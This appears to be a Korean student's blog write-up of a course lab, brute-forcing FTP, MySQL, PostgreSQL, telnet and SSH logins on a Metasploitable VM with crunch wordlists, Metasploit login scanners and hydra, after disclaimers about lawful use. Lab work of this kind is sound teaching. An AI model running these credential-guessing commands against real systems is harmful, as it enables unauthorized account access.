[모의 해킹] Metasploitable을 이용한 무차별 대입 공격

! 이 포스트의 내용은 전공 강의에서 다룬 리눅스 보안 실습의 기록용이며, 이는 학습 목적으로만 사용되어야 합니다.

! 어떠한 경우에도 이러한 기술을 악용하거나 불법적인 활동에 사용해서는 안 됩니다.

 

! 모의 해킹과 관련된 실습은 합법적인 환경에서만 수행되어야 하며, 무단으로 다른 사람의 시스템에 접근하는 등의 행위는 법적인 문제로 이어질 수 있습니다. 이러한 기술을 사용할 때에는 항상 윤리적인 책임을 갖고 행동해야 합니다.

 

 

무차별 대입 공격이란?

 

가능한 모든 조합의 키나 비밀번호를 체계적으로 시도하여 올바른 값을 찾아내는 방식이다. 이 공격은 단순하지만, 강력한 암호화 또는 충분히 긴 비밀번호를 사용하는 경우 시간과 자원 면에서 비효율적일 수 있다.

 

 

실습 환경

이 실습에서는 모의 침투 연습을 위해 Metasploitable을 사용한다.

Metasploitable은 보안 연구 및 교육 목적으로 사용되는 취약한 가상 머신이다.  Metasploitable은 의도적으로 여러 보안 취약점을 포함하고 있어, 실제 환경에서 해킹 연습을 하고 보안 툴을 테스트하는 데 유용하다.

 

 

Metasploitable 실행 및 로그인

root 계정 password 설정

 

 MySQL 데이터베이스 root 비밀번호 변경

 

~$ mysql -u root -p

> use mysql;
> update user set password=password('1234') where user='root';
> flush privileges;

 

 

Crunch 기능을 이용하여 공격용 패스워드 작성

 

~# cat /usr/share/crunch/charset.lst

 

charset.lst는 crunch라는 비밀번호 생성 도구에서 사용하는 문자 집합 목록을 포함하고 있다. 이 파일은 다양한 문자 집합을 정의하여 사용자가 원하는 비밀번호 패턴에 맞춰 비밀번호를 생성할 수 있게 한다.

 

~# crunch 1 6 -f /usr/share/crunch/charset.lst numeric -o /root/passwords_6.txt

 

crunch 도구를 사용하여 숫자로 구성된 1~6 길이의 모든 가능한 비밀번호 조합을 생성하고, 그 결과를 파일로 저장한다. 

파일에는 0부터 999999까지의 비밀번호가 저장된다.

 

 

~# cat >> /root/passwords_6.txt

 

cat 명령어로 패스워드 파일에 postgres 패스워드를 추가한다.

 

 

user.txt라는 이름의 공격 대상 ID가 저장된 파일을 생성한다.

0부터 999999까지 숫자를 모두 대입하기에는 많은 시간이 걸리므로 빠른 실습을 위해 간단한 패스워드 파일을 작성한다.

 

 

 

Metasploitable 'FTP 서버' 무차별 대입 공격 (Msfconsole 이용)

 

 

위 명령어는 FTP 로그인 시도를 자동화하는 과정이다. 이 스캐너는 주어진 사용자명과 비밀번호 리스트를 사용하여 지정된 FTP 서버에 대해 무차별 대입 공격을 수행한다.

> use auxiliary/scanner/ftp/ftp_login

> set rhosts 192.168.255.148
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run

 

> use auxiliary/scanner/ftp/ftp_login : FTP 로그인 시도를 위한 스캐너 모듈을 선택

> set rhosts 192.168.255.148 : 공격 대상 IP  주소를 설정
> set user_file /root/users.txt : 앞에서 생성했던 공격대상 ID 리스트가 포함된 파일의 경로를 설정
> set pass_file /root/password_short.txt : 앞에서 생성했던 비밀번호 파일의 경로를 설정
> set stop_on_success true : 로그인 공격에 성공하면 공격을 중지하도록 설정
> set threads 256 : 스레드 수 설정
> run : 실행

 

무차별 대입공격 중 ID는 postgres, 패스워드는 postgres로 로그인이 성공하여 종료된 것을 볼 수 있다.

 

 

 

 

Metasploitable 'MySQL 서버' 무차별 대입 공격 (Msfconsole 이용)

 

 

FTP 서버 외에도 다른 서버들로 무차별 대입을 통해 공격을 수행해 보았다.

먼저 MySQL 서버이다. 명령어는 동일하며 스캐너 모듈 선택 시 mysql/mysql_login 모듈을 선택하고, 3306으로 포트를 지정했다.

> use auxiliary/scanner/mysql/mysql_login

> set rhosts 192.168.255.148
> set rport 3306
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run

 

무차별 대입공격 중 ID는 root, 패스워드는 1234로 로그인이 성공하여 종료된 것을 볼 수 있다.

 

 

 

Metasploitable 'postgreSQL 서버' 무차별 대입 공격 (Msfconsole 이용)

 

> use auxiliary/scanner/postgres/postgres_login

> set rhosts 192.168.255.148
> set rport 5432
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run

 

 

Metasploitable 'telnet 서버' 무차별 대입 공격 (Msfconsole 이용)

 

 

> use auxiliary/scanner/telnet/telnet_login

> set rhosts 192.168.255.148
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run

 

 

Metasploitable 'SSH 서버' 무차별 대입 공격 (Msfconsole 이용)

 

 

> use auxiliary/scanner/ssh/ssh_login

> set rhosts 192.168.255.148
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run

 

Metasploitable 'FTP 서버' 무차별 대입 공격 (hydra 이용)

 

 

~# hydra -l postgrs -P /root/password_short.txt -f 192.168.255.148 ftp

 

 

Metasploitable 'SSH 서버' 무차별 대입 공격 (hydra 이용)

 

~# hydra -l root -P /root/password_short.txt -f 192.168.255.148 ssh

 

 

Metasploitable 'telnet 서버' 무차별 대입 공격 (hydra 이용)

 

~# hydra -l root -P /root/password_short.txt -f 192.168.255.148 telnet